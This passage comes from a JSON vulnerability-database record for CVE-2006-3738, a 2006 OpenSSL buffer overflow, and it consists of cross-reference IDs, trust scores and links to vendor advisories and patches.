            "id": "23280",
            "trust": 2.6
          },
          {
            "db": "SECUNIA",
            "id": "23309",
            "trust": 2.6
          },
          {
            "db": "BID",
            "id": "20249",
            "trust": 2.1
          },
          {
            "db": "CERT/CC",
            "id": "VU#547300",
            "trust": 2.1
          },
          {
            "db": "SECUNIA",
            "id": "22207",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22212",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22116",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22216",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22220",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22330",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22130",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22240",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22259",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22260",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22165",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22166",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22172",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22284",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22186",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22193",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22094",
            "trust": 1.8
          },
          {
            "db": "SECTRACK",
            "id": "1016943",
            "trust": 1.8
          },
          {
            "db": "NVD",
            "id": "CVE-2006-3738",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "30161",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "26329",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "24930",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "30124",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22500",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22799",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22298",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "31492",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "23038",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22460",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "23915",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22385",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "23155",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22487",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22654",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "23680",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22626",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "23794",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22633",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22772",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "24950",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "25889",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22544",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "23340",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22791",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22758",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2007-1401",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2007-0343",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-3902",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-3869",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-3860",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-4401",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-4314",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2007-2315",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-4264",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-4036",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-4417",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-4750",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-3820",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2007-2783",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-3936",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-4443",
            "trust": 1.0
          },
          {
            "db": "SECTRACK",
            "id": "1017522",
            "trust": 1.0
          },
          {
            "db": "USCERT",
            "id": "TA06-333A",
            "trust": 1.0
          },
          {
            "db": "OSVDB",
            "id": "29262",
            "trust": 1.0
          },
          {
            "db": "BID",
            "id": "20246",
            "trust": 0.8
          },
          {
            "db": "CERT/CC",
            "id": "VU#386964",
            "trust": 0.8
          },
          {
            "db": "SECUNIA",
            "id": "21709",
            "trust": 0.8
          },
          {
            "db": "CERT/CC",
            "id": "VU#845620",
            "trust": 0.8
          },
          {
            "db": "XF",
            "id": "29237",
            "trust": 0.8
          },
          {
            "db": "PACKETSTORM",
            "id": "169663",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "53566",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "50560",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "53990",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "50548",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#386964"
          },
          {
            "db": "CERT/CC",
            "id": "VU#845620"
          },
          {
            "db": "CERT/CC",
            "id": "VU#547300"
          },
          {
            "db": "BID",
            "id": "20249"
          },
          {
            "db": "PACKETSTORM",
            "id": "169663"
          },
          {
            "db": "PACKETSTORM",
            "id": "53566"
          },
          {
            "db": "PACKETSTORM",
            "id": "50560"
          },
          {
            "db": "PACKETSTORM",
            "id": "53990"
          },
          {
            "db": "PACKETSTORM",
            "id": "50548"
          },
          {
            "db": "NVD",
            "id": "CVE-2006-3738"
          }
        ]
      },
      "id": "VAR-200609-1114",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.28107159000000004
      },
      "last_update_date": "2025-09-30T22:48:42.652000Z",
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-119",
            "trust": 1.0
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2006-3738"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 3.4,
            "url": "http://www.securityfocus.com/bid/22083"
          },
          {
            "trust": 2.8,
            "url": "http://www.openssl.org/news/secadv_20060928.txt"
          },
          {
            "trust": 1.8,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102668-1"
          },
          {
            "trust": 1.6,
            "url": "http://secunia.com/advisories/23280/"
          },
          {
            "trust": 1.6,
            "url": "http://secunia.com/advisories/23309/"
          },
          {
            "trust": 1.3,
            "url": "http://support.avaya.com/elmodocs2/security/asa-2006-260.htm"
          },
          {
            "trust": 1.3,
            "url": "http://www.cisco.com/warp/public/707/cisco-sr-20061108-openssl.shtml"
          },
          {
            "trust": 1.3,
            "url": "http://kolab.org/security/kolab-vendor-notice-11.txt"
          },
          {
            "trust": 1.3,
            "url": "http://www.kb.cert.org/vuls/id/547300"
          },
          {
            "trust": 1.1,
            "url": "http://www.vmware.com/support/esx2/doc/esx-202-200612-patch.html"
          },
          {
            "trust": 1.1,
            "url": "http://www.vmware.com/support/vi3/doc/esx-3069097-patch.html"
          },
          {
            "trust": 1.1,
            "url": "http://www.vmware.com/support/esx25/doc/esx-254-200612-patch.html"
          },
          {
            "trust": 1.1,
            "url": "http://www.vmware.com/support/esx21/doc/esx-213-200612-patch.html"
          },
          {
            "trust": 1.1,
            "url": "http://www.vmware.com/support/esx25/doc/esx-253-200612-patch.html"
          },
          {
            "trust": 1.1,
            "url": "http://www.vmware.com/support/vi3/doc/esx-9986131-patch.html"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22385"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22172"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/26329"
          },
          {
            "trust": 1.0,
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a4256"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22330"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22220"
          },
          {
            "trust": 1.0,
            "url": "http://marc.info/?l=bugtraq\u0026m=130497311408250\u0026w=2"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22116"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22799"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22094"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22654"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/3860"
          },
          {
            "trust": 1.0,
            "url": "http://www.debian.org/security/2006/dsa-1185"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22193"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22216"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/4401"
          },
          {
            "trust": 1.0,
            "url": "http://www.oracle.com/technetwork/topics/security/cpujan2007-101493.html"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22633"
          },
          {
            "trust": 1.0,
            "url": "http://www.mandriva.com/security/advisories?name=mdksa-2006:172"
          },
          {
            "trust": 1.0,
            "url": "http://securitytracker.com/id?1017522"
          },
          {
            "trust": 1.0,
            "url": "http://www.redhat.com/support/errata/rhsa-2008-0629.html"
          },
          {
            "trust": 1.0,
            "url": "http://www.securityfocus.com/archive/1/447318/100/0/threaded"
          },
          {
            "trust": 1.0,
            "url": "http://slackware.com/security/viewer.php?l=slackware-security\u0026y=2006\u0026m=slackware-security.676946"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22626"
          },
          {
            "trust": 1.0,
            "url": "http://issues.rpath.com/browse/rpl-613"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22212"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/23309"
          },
          {
            "trust": 1.0,
            "url": "http://lists.apple.com/archives/security-announce/2006/nov/msg00001.html"
          },
          {
            "trust": 1.0,
            "url": "http://openvpn.net/changelog.html"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2007/2783"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22460"
          },
          {
            "trust": 1.0,
            "url": "http://www.securityfocus.com/archive/1/470460/100/0/threaded"
          },
          {
            "trust": 1.0,
            "url": "http://www.securityfocus.com/bid/20249"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22487"
          },
          {
            "trust": 1.0,
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/29237"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22240"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22772"
          },
          {
            "trust": 1.0,
            "url": "http://itrc.hp.com/service/cki/docdisplay.do?docid=c00805100"
          },
          {
            "trust": 1.0,
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a9370"
          },
          {
            "trust": 1.0,
            "url": "http://lists.grok.org.uk/pipermail/full-disclosure/2006-september/049715.html"
          },
          {
            "trust": 1.0,
            "url": "http://www.mandriva.com/security/advisories?name=mdksa-2006:178"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/24950"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/4314"
          },
          {
            "trust": 1.0,
            "url": "http://www.debian.org/security/2006/dsa-1195"
          },
          {
            "trust": 1.0,
            "url": "http://www.securityfocus.com/archive/1/447393/100/0/threaded"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/23915"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/25889"
          },
          {
            "trust": 1.0,
            "url": "ftp://patches.sgi.com/support/free/security/advisories/20061001-01-p.asc"
          },
          {
            "trust": 1.0,
            "url": "http://www.xerox.com/downloads/usa/en/c/cert_essnetwork_xrx07001_v1.pdf"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22298"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/23155"
          },
          {
            "trust": 1.0,
            "url": "http://www.redhat.com/support/errata/rhsa-2006-0695.html"
          },
          {
            "trust": 1.0,
            "url": "http://support.avaya.com/elmodocs2/security/asa-2006-220.htm"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/4036"
          },
          {
            "trust": 1.0,
            "url": "http://www.serv-u.com/releasenotes/"
          },
          {
            "trust": 1.0,
            "url": "ftp://ftp.netbsd.org/pub/netbsd/security/advisories/netbsd-sa2008-007.txt.asc"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22165"
          },
          {
            "trust": 1.0,
            "url": "http://securitytracker.com/id?1016943"
          },
          {
            "trust": 1.0,
            "url": "http://www.securityfocus.com/archive/1/456546/100/200/threaded"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22259"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/23038"
          },
          {
            "trust": 1.0,
            "url": "http://www.novell.com/linux/security/advisories/2006_24_sr.html"
          },
          {
            "trust": 1.0,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102711-1"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2007/2315"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/3820"
          },
          {
            "trust": 1.0,
            "url": "http://sourceforge.net/project/shownotes.php?release_id=461863\u0026group_id=69227"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2007/1401"
          },
          {
            "trust": 1.0,
            "url": "http://docs.info.apple.com/article.html?artnum=304829"
          },
          {
            "trust": 1.0,
            "url": "http://www.trustix.org/errata/2006/0054"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/23280"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22130"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22166"
          },
          {
            "trust": 1.0,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-66-201531-1"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2007/0343"
          },
          {
            "trust": 1.0,
            "url": "http://www.ubuntu.com/usn/usn-353-1"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/23794"
          },
          {
            "trust": 1.0,
            "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?objectid=c01118771"
          },
          {
            "trust": 1.0,
            "url": "http://security.freebsd.org/advisories/freebsd-sa-06:23.openssl.asc"
          },
          {
            "trust": 1.0,
            "url": "http://www.openpkg.org/security/advisories/openpkg-sa-2006.021-openssl.html"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/4443"
          },
          {
            "trust": 1.0,
            "url": "http://www.osvdb.org/29262"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/31492"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/3902"
          },
          {
            "trust": 1.0,
            "url": "http://www.cisco.com/en/us/products/hw/contnetw/ps4162/tsd_products_security_response09186a008077af1b.html"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22260"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22284"
          },
          {
            "trust": 1.0,
            "url": "http://www.novell.com/linux/security/advisories/2006_58_openssl.html"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22500"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/3869"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22186"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/30124"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/30161"
          },
          {
            "trust": 1.0,
            "url": "http://www.gentoo.org/security/en/glsa/glsa-200612-11.xml"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22544"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/23680"
          },
          {
            "trust": 1.0,
            "url": "http://www.gentoo.org/security/en/glsa/glsa-200805-07.xml"
          },
          {
            "trust": 1.0,
            "url": "http://security.gentoo.org/glsa/glsa-200610-11.xml"
          },
          {
            "trust": 1.0,
            "url": "http://itrc.hp.com/service/cki/docdisplay.do?docid=c00849540"
          },
          {
            "trust": 1.0,
            "url": "https://www2.itrc.hp.com/service/cki/docdisplay.do?docid=c00967144"
          },
          {
            "trust": 1.0,
            "url": "http://www130.nortelnetworks.com/go/main.jsp?cscat=bltndetail\u0026documentoid=498093\u0026renditionid=\u0026poid=8881"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/3936"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/4750"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22791"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22758"
          },
          {
            "trust": 1.0,
            "url": "http://openbsd.org/errata.html#openssl2"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/4264"
          },
          {
            "trust": 1.0,
            "url": "http://www.us-cert.gov/cas/techalerts/ta06-333a.html"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/24930"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/23340"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22207"
          },
          {
            "trust": 1.0,
            "url": "http://www.mandriva.com/security/advisories?name=mdksa-2006:177"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/4417"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/cert/jvnvu%23386964/index.html"
          },
          {
            "trust": 0.8,
            "url": "http://www.securityfocus.com/bid/20246"
          },
          {
            "trust": 0.8,
            "url": "http://www.imc.org/ietf-openpgp/mail-archive/msg14307.html"
          },
          {
            "trust": 0.8,
            "url": "http://www.matasano.com/log/469/many-rsa-signatures-may-be-forgeable-in-openssl-and-elsewhere/"
          },
          {
            "trust": 0.8,
            "url": "http://www.openssl.org/news/secadv_20060905.txt "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/21709/"
          },
          {
            "trust": 0.8,
            "url": "http://www.rsasecurity.com/rsalabs/node.asp?id=2125"
          },
          {
            "trust": 0.8,
            "url": "http://www.ietf.org/rfc/rfc3447.txt"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/cert/jvnvu%23547300/index.html"
          },
          {
            "trust": 0.8,
            "url": "http://lists.grok.org.uk/pipermail/full-disclosure/2006-september/049715.html "
          },
          {
            "trust": 0.8,
            "url": "https://issues.rpath.com/browse/rpl-613 "
          },
          {
            "trust": 0.8,
            "url": "http://www.openssl.org/news/secadv_20060928.txt "
          },
          {
            "trust": 0.8,
            "url": "http://kolab.org/security/kolab-vendor-notice-11.txt "
          },
          {
            "trust": 0.8,
            "url": "http://openvpn.net/changelog.html "
          },
          {
            "trust": 0.8,
            "url": "http://www.serv-u.com/releasenotes/ "
          },
          {
            "trust": 0.8,
            "url": "http://openbsd.org/errata.html#openssl2 "
          },
          {
            "trust": 0.8,
            "url": "http://www.securityfocus.com/bid/20249 "
          },
          {
            "trust": 0.8,
            "url": "http://securitytracker.com/id?1016943 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22130 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22094 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22165 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22186 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22193 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22207 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22259 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22260 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22166 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22172 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22212 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22240 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22216 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22116 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22220 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22284 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22330 "
          },
          {
            "trust": 0.8,
            "url": "http://xforce.iss.net/xforce/xfdb/29237 "
          },
          {
            "trust": 0.3,
            "url": "http://www.cisco.com/warp/public/707/cisco-air-20061108-openssl.shtml"
          },
          {
            "trust": 0.3,
            "url": "http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2007.html"
          },
          {
            "trust": 0.3,
            "url": "http://www.itefix.no/phpws/index.php?module=announce\u0026ann_user_op=view\u0026ann_id=80"
          },
          {
            "trust": 0.3,
            "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?lang=en\u0026cc=us\u0026objectid=c00967144"
          },
          {
            "trust": 0.3,
            "url": "http://www1.itrc.hp.com/service/cki/docdisplay.do?admit=-682735245+1165342903618+28353475\u0026docid=c00805100"
          },
          {
            "trust": 0.3,
            "url": "http://www14.software.ibm.com/webapp/set2/sas/f/hmc/home.html"
          },
          {
            "trust": 0.3,
            "url": "http://www.ipcop.org/modules.php?op=modload\u0026name=news\u0026file=article\u0026sid=31\u0026mode=thread\u0026order=0\u0026thold=0"
          },
          {
            "trust": 0.3,
            "url": "http://www.ingate.com/relnote-452.php"
          },
          {
            "trust": 0.3,
            "url": "http://www.cyberguard.info/snapgear/releases.html"
          },
          {
            "trust": 0.3,
            "url": "http://www.stonesoft.com/en/support/security_advisories/2909_2006.html"
          },
          {
            "trust": 0.3,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102711-1\u0026searchclause="
          },
          {
            "trust": 0.3,
            "url": "/archive/1/481217"
          },
          {
            "trust": 0.3,
            "url": "https://www.itrc.hp.com/service/cki/docdisplay.do?docid=emr_na-c02475053"
          },
          {
            "trust": 0.3,
            "url": "http://rhn.redhat.com/errata/rhsa-2008-0264.html"
          },
          {
            "trust": 0.3,
            "url": "http://rhn.redhat.com/errata/rhsa-2008-0525.html"
          },
          {
            "trust": 0.3,
            "url": "http://rhn.redhat.com/errata/rhsa-2008-0629.html"
          },
          {
            "trust": 0.3,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102668-1\u0026searchclause="
          },
          {
            "trust": 0.3,
            "url": "http://www116.nortelnetworks.com/pub/repository/clarify/document/2006/44/021420-01.pdf"
          },
          {
            "trust": 0.3,
            "url": "http://a1851.g.akamaitech.net/f/1851/2996/24h/cacheb.xerox.com/downloads/usa/en/c/cert_essnetwork_xrx07001_v1.pdf"
          },
          {
            "trust": 0.3,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2006-2940"
          },
          {
            "trust": 0.3,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2006-4343"
          },
          {
            "trust": 0.3,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2006-3738"
          },
          {
            "trust": 0.3,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2006-2937"
          },
          {
            "trust": 0.3,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-2940"
          },
          {
            "trust": 0.3,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-4343"
          },
          {
            "trust": 0.3,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-3738"
          },
          {
            "trust": 0.3,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-2937"
          },
          {
            "trust": 0.2,
            "url": "https://www.niscc.gov.uk)."
          },
          {
            "trust": 0.2,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2006-4339"
          },
          {
            "trust": 0.1,
            "url": "https://www.openssl.org/source/"
          },
          {
            "trust": 0.1,
            "url": "https://www.openssl.org/source/mirror.html):"
          },
          {
            "trust": 0.1,
            "url": "http://kb.vmware.com/kb/9986131"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/"
          },
          {
            "trust": 0.1,
            "url": "http://www.vmware.com/vmtn/technology/security/security_response.html"
          },
          {
            "trust": 0.1,
            "url": "http://www.vmware.com/security"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-3589"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2006-3589"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-4980"
          },
          {
            "trust": 0.1,
            "url": "http://lists.grok.org.uk/full-disclosure-charter.html"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-4339"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2006-4980"
          },
          {
            "trust": 0.1,
            "url": "http://kb.vmware.com/kb/3069097"
          },
          {
            "trust": 0.1,
            "url": "http://pgp.openpkg.org"
          },
          {
            "trust": 0.1,
            "url": "http://www.openssl.org/"
          },
          {
            "trust": 0.1,
            "url": "http://www.openpkg.org"
          },
          {
            "trust": 0.1,
            "url": "http://www.openpkg.org/security/"
          },
          {
            "trust": 0.1,
            "url": "http://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/displayproductinfo.pl?productnumber=hpuxwssuite"
          },
          {
            "trust": 0.1,
            "url": "http://software.hp.com/portal/swdepot/displayproductinfo.do?productnumber=b6834aa"
          },
          {
            "trust": 0.1,
            "url": "http://www.itrc.hp.com/service/cki/secbullarchive.do"
          },
          {
            "trust": 0.1,
            "url": "http://h30046.www3.hp.com/driveralertprofile.php?regioncode=na\u0026langcode=useng\u0026jumpid=in_sc-gen__driveritrc\u0026topiccode=itrc"
          },
          {
            "trust": 0.1,
            "url": "http://h30046.www3.hp.com/subsignin.php"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2005-2969"
          },
          {
            "trust": 0.1,
            "url": "http://www.mandriva.com/security/"
          },
          {
            "trust": 0.1,
            "url": "http://www.mandriva.com/security/advisories"
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#386964"
          },
          {
            "db": "CERT/CC",
            "id": "VU#845620"
          },
          {
            "db": "CERT/CC",
            "id": "VU#547300"
          },
          {
            "db": "BID",
            "id": "20249"
          },
          {
            "db": "PACKETSTORM",
            "id": "169663"
          },
          {
            "db": "PACKETSTORM",
            "id": "53566"
          },
          {
            "db": "PACKETSTORM",
            "id": "50560"
          },
          {
            "db": "PACKETSTORM",
            "id": "53990"
          },
          {
            "db": "PACKETSTORM",
            "id": "50548"
          },
          {
            "db": "NVD",
            "id": "CVE-2006-3738"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CERT/CC",
            "id": "VU#386964"
          },
          {
            "db": "CERT/CC",
            "id": "VU#845620"
          },
          {
            "db": "CERT/CC",
            "id": "VU#547300"
          },
          {
            "db": "BID",
            "id": "20249"
          },
          {
            "db": "PACKETSTORM",
            "id": "169663"
          },
          {
            "db": "PACKETSTORM",
            "id": "53566"
          },
          {
            "db": "PACKETSTORM",
            "id": "50560"
          },
          {
            "db": "PACKETSTORM",
            "id": "53990"
          },
          {
            "db": "PACKETSTORM",
            "id": "50548"
          },
          {
            "db": "NVD",
            "id": "CVE-2006-3738"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
